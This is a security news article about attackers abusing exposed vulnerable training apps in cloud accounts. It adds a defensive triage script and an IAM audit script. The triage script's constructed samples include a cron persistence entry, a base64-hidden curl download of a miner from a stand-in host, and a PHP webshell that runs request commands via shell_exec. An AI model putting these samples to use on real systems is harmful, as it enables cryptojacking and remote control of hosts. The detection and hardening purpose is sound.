Exposed Security Training Apps Become a Backdoor Into Enterprise Cloud Environments
- Cyber Jack
Security teams have long relied on deliberately vulnerable web applications to train defenders and test internal defenses. New research shows those same tools are now being used as a shortcut into real enterprise cloud environments.
An investigation by automated penetration testing firm Pentera found that threat actors are actively exploiting misconfigured security training and testing applications that have been left exposed on the public internet. These include intentionally vulnerable platforms such as DVWA, OWASP Juice Shop, Hackazon, and bWAPP. When deployed carelessly inside cloud environments, Pentera says, they can provide attackers with direct access to sensitive systems at large organizations.
The risk is not hypothetical. Pentera identified 1,926 live vulnerable applications reachable from the open web, many deployed across AWS, Google Cloud, and Microsoft Azure environments. In many cases, the applications were tied to overly permissive identity and access management roles and executed from privileged cloud accounts, dramatically increasing the blast radius of a single compromise.
According to Pentera, the exposed systems were linked to multiple Fortune 500 organizations, including Cloudflare, F5, and Palo Alto Networks. The companies were notified of the findings and have since remediated the issues.
Pentera Labs confirmed that attackers are already exploiting these environments in the wild.
"During the investigation, we discovered clear evidence that attackers are actively exploiting these exact attack vectors in the wild – deploying crypto miners, webshells, and persistence mechanisms on compromised systems," the researchers said.
In one of the clearest indicators of active abuse, Pentera found that roughly 20 percent of 616 exposed DVWA instances contained artifacts associated with malicious activity. Many of the vulnerable deployments still used default credentials, and more than half exposed cloud credential sets that violated basic least-privilege practices.
Once inside, attackers were able to access cloud storage services such as Amazon S3, Google Cloud Storage, and Azure Blob Storage. In some cases, the compromised credentials allowed read and write access to secrets managers, interaction with container registries, and even administrative control over the cloud environment.
The attackers also demonstrated a focus on persistence. Pentera uncovered a script called watchdog.sh that reinstalled itself if removed, restored its code from a base64-encoded backup, and re-downloaded the XMRig cryptocurrency miner from GitHub. The script also pulled down additional AES-256-encrypted tooling from a Dropbox account and actively killed competing miners running on the same host.
Other systems were found running a PHP webshell called filemanager.php, which enabled file browsing, uploads, downloads, and remote command execution. The webshell used hardcoded authentication credentials and was configured with a Europe/Minsk timezone setting, a detail that may offer clues about the operators behind the activity.
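The watchdog script and the filemanager.php webshell described above leave host-level traces that a responder can check for mechanically. The following triage script is an added example, not Pentera's tooling or any artifact from the report: it runs over constructed stand-ins for a compromised training host (a crontab, a `ps` listing, a watchdog-style script and a PHP file) and flags the indicators the article describes. All paths, the pool address, the download URL and the password are hypothetical; the indicator strings (watchdog.sh, xmrig, a base64-embedded backup that decodes to a shell script, the Europe/Minsk timezone, a hardcoded credential check feeding `shell_exec`) follow the article.

```python
"""Host triage for the persistence and webshell indicators in the article.
Added example, not Pentera's code. All inputs are constructed; the
indicator strings follow the article's description."""
import base64
import re

# Constructed: what the base64 "backup" restores; hypothetical download URL
_INNER_SCRIPT = b"#!/bin/sh\ncurl -fsSL https://github.invalid/x/xmrig -o /tmp/.x/xmrig\n"
_INNER_B64 = base64.b64encode(_INNER_SCRIPT).decode()

SAMPLE_CRON = (  # constructed crontab
    "0 2 * * * /usr/bin/certbot renew\n"
    "* * * * * /bin/sh /tmp/.x/watchdog.sh >/dev/null 2>&1\n"
)

SAMPLE_PS = (  # constructed `ps -eo pid,comm,args` output
    "  PID COMMAND ARGS\n"
    "    1 systemd /sbin/init\n"
    " 4432 sh /bin/sh /tmp/.x/watchdog.sh\n"
    " 4440 xmrig /tmp/.x/xmrig -o pool.invalid:3333\n"
    " 4510 apache2 /usr/sbin/apache2 -k start\n"
)

SAMPLE_WATCHDOG = (  # constructed self-healing script with an embedded backup
    "#!/bin/sh\n"
    f"BACKUP='{_INNER_B64}'\n"
    "[ -f /tmp/.x/run.sh ] || echo \"$BACKUP\" | base64 -d > /tmp/.x/run.sh\n"
    "pkill -f kdevtmpfsi\n"  # kills a competing miner
)

SAMPLE_PHP = (  # constructed webshell fragment (hypothetical password)
    "<?php\n"
    "date_default_timezone_set('Europe/Minsk');\n"
    "if ($_POST['pass'] !== 'letmein123') { die('denied'); }\n"
    "if (isset($_REQUEST['cmd'])) { echo shell_exec($_REQUEST['cmd']); }\n"
)

MINER_NAMES = ("xmrig", "kdevtmpfsi", "kinsing")
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
TMP_PATH_RE = re.compile(r"/tmp/\.\S+|/dev/shm/")


def find_cron_persistence(crontab):
    """Crontab lines naming watchdog.sh or running from hidden temp paths."""
    hits = []
    for line in crontab.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if "watchdog.sh" in line or TMP_PATH_RE.search(line):
            hits.append(line)
    return hits


def find_miner_pids(ps_output):
    """PIDs whose command name or arguments contain a known miner name."""
    pids = []
    for line in ps_output.splitlines()[1:]:  # skip header
        parts = line.split(None, 2)
        if len(parts) < 2:
            continue
        pid, comm = parts[0], parts[1]
        args = parts[2] if len(parts) > 2 else ""
        if any(m in comm or m in args for m in MINER_NAMES):
            pids.append(int(pid))
    return pids


def find_embedded_scripts(script_text):
    """Decode long base64 blobs; return those that are themselves shell scripts
    (the 'restore from backup' trick the watchdog used)."""
    found = []
    for blob in B64_RE.findall(script_text):
        try:
            decoded = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if decoded.startswith(b"#!/"):
            found.append(decoded.decode("utf-8", "replace"))
    return found


def scan_php_for_webshell(php_source):
    """Indicator flags for a PHP file: odd timezone, hardcoded credential
    comparison against request input, and command execution from input."""
    return {
        "minsk_timezone": "Europe/Minsk" in php_source,
        "hardcoded_password": bool(re.search(
            r"\$_(?:POST|GET|REQUEST)\[[^\]]+\]\s*[!=]==?\s*['\"]", php_source)),
        "command_exec_from_request": bool(re.search(
            r"(?:shell_exec|system|passthru|exec|popen)\s*\(\s*\$_(?:POST|GET|REQUEST)",
            php_source)),
    }


def triage():
    """Run every check over the constructed samples."""
    return {
        "cron": find_cron_persistence(SAMPLE_CRON),
        "miner_pids": find_miner_pids(SAMPLE_PS),
        "embedded_scripts": find_embedded_scripts(SAMPLE_WATCHDOG),
        "php": scan_php_for_webshell(SAMPLE_PHP),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

On a real host the same functions would take `crontab -l` output for every user, `ps -eo pid,comm,args`, and the contents of anything under the web root and `/tmp`; the point of the base64 check is that the live script can look harmless while the payload it restores is in the blob.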
Security leaders say the findings highlight a basic but often overlooked operational failure. Kevin Kirkwood, CISO at Exabeam, described the exposure of these tools as an avoidable self-inflicted wound.
"Leaving a deliberately vulnerable testing tool in a space that can be discovered and exploited is the moral equivalent of running with sharp scissors. It just isn't something that you want to do.
"Threat actors have long been using the tools that were created to test and identify gaps in systems (Kali Linux, Burp Suite, et al…) that we are trying to correct. The difference is that these tools require action on the part of the threat actor to have those tools loaded somewhere during the attack.
"In these latest breaches, the tools were left in plain view on the systems that they were then used to attack."
Pentera emphasized that the malicious artifacts were identified after responsible disclosure had already taken place and after affected organizations had fixed the exposed applications. The episode serves as a warning about how easily training infrastructure can become production risk when cloud environments move faster than governance.
The researchers recommend that organizations maintain a complete inventory of cloud resources, including security testing applications, and isolate them from production systems. Least-privilege IAM roles should be enforced for non-production environments, default credentials should never be left in place, and temporary testing resources should be configured to expire automatically.
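Two of those recommendations, least-privilege IAM roles for non-production environments and automatic expiry of temporary testing resources, can be checked mechanically. The script below is an added example, not Pentera's tooling: it audits a constructed policy document of the kind the report describes (service-wide wildcards, `Resource: "*"`, access to secrets and registries from a lab role) against a scoped alternative, and checks an `expires-on` tag on the resource. The policy shape is standard AWS IAM JSON; the role names, bucket name, tag key and dates are hypothetical, and the check runs offline on Python dicts with no cloud API calls.

```python
"""Least-privilege and expiry audit for non-production IAM roles.
Added example, not Pentera's code. Policies, tags and names are
constructed; the tag key 'expires-on' is this example's convention."""
from datetime import date

# Services a throwaway training role has no business touching
SENSITIVE_PREFIXES = ("iam:", "sts:", "secretsmanager:", "ecr:", "kms:")

# Constructed: the kind of role an exposed lab app was found running under
OVERLY_PERMISSIVE = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "s3:*", "Resource": "*"},
        {"Effect": "Allow", "Action": ["secretsmanager:*", "ecr:*"], "Resource": "*"},
        {"Effect": "Allow", "Action": "*", "Resource": "*"},
    ],
}

# Constructed: read-only access to one lab bucket (hypothetical bucket name)
LEAST_PRIVILEGE = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["s3:GetObject", "s3:ListBucket"],
            "Resource": ["arn:aws:s3:::lab-dvwa-assets", "arn:aws:s3:::lab-dvwa-assets/*"],
        },
    ],
}


def _as_list(value):
    """IAM allows a string or a list in Action/Resource; normalise to list."""
    return value if isinstance(value, list) else [value]


def audit_policy(policy):
    """Return human-readable findings for Allow statements that break
    least privilege: admin or service-wide wildcards, Resource '*', and
    any action on a sensitive service."""
    findings = []
    for i, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        for action in _as_list(stmt.get("Action", [])):
            if action == "*":
                findings.append(f"stmt {i}: full admin wildcard action '*'")
            elif action.endswith(":*"):
                findings.append(f"stmt {i}: service-wide wildcard {action}")
            if action.lower().startswith(SENSITIVE_PREFIXES):
                findings.append(f"stmt {i}: sensitive service action {action} on a lab role")
        if "*" in _as_list(stmt.get("Resource", [])):
            findings.append(f"stmt {i}: Resource '*'")
    return findings


def expiry_status(tags, today):
    """Classify a resource's expiry tag: missing, invalid, expired or ok."""
    raw = tags.get("expires-on")
    if raw is None:
        return "missing"
    try:
        expires = date.fromisoformat(raw)
    except ValueError:
        return "invalid"
    return "expired" if expires < today else "ok"


def audit_role(name, policy, tags, today):
    """Combine both checks; a role passes only with no findings and a live expiry."""
    findings = audit_policy(policy)
    status = expiry_status(tags, today)
    return {"role": name, "findings": findings, "expiry": status,
            "ok": not findings and status == "ok"}


if __name__ == "__main__":
    today = date(2024, 2, 1)  # constructed reference date
    for name, pol, tags in [
        ("lab-dvwa-role", OVERLY_PERMISSIVE, {}),
        ("lab-dvwa-role-v2", LEAST_PRIVILEGE, {"expires-on": "2024-03-01"}),
    ]:
        print(audit_role(name, pol, tags, today))
```

The wildcard checks are deliberately string-based: `s3:*` and `secretsmanager:*` are the patterns that turned a training app into read and write access to buckets and secrets in the report, and they are easy to match without any policy simulator. An expiry tag only helps if something enforces it, so the `expired` status is meant to drive a scheduled teardown job rather than just a report.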
As attackers continue to scan the internet for low-effort entry points, even tools designed to make defenders stronger can become liabilities when left unattended. In modern cloud environments, a forgotten test app can be all it takes to turn practice into breach.